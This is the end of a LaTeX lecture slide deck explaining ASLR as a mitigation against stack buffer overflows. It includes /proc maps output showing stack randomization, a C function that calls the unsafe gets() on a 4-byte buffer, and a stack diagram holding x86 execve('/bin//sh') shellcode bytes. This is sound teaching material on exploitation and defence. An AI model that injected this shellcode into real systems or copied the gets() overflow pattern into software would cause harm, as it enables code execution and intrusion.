    \textbf{A}ddress \textbf{S}ource \textbf{L}ayout
    \textbf{R}andomization. At execution time we can randomize the
    various addresses (with a section granularity) to make
    impossible to the attacker the guessing of the addresses.

    \begin{lstlisting}[style=carpenterBASH]
~ % sleep 1 & grep 'stack' /proc/${!}/maps
7ffceda25000-7ffceda46000 rw-p 00000000 00:00 0                          [stack]
~ % sleep 1 & grep 'stack' /proc/${!}/maps
7fff6f016000-7fff6f037000 rw-p 00000000 00:00 0                          [stack]
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: ASLR}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

    gets(e);
==>    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {? ? ? ?};
                \node[left=.5cm of b] (baseleft) {};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {0x31 0xc0 0x99 0x50};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {0x68 0x2f 0x2f 0x73};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (e) {0x68 0x68 0x2f 0x62};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (1) {0x69 0x6e 0x89 0xe3};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {0x50 0x53 0x89 0xe1};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {0xb0 0x0b 0xcd 0x80};
                \node[left=.5cm of 3] (endleft) {};
                \draw[white, thick, ->] (b) -- (baseleft.center) -- (endleft.center) -- (3);
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\end{document}
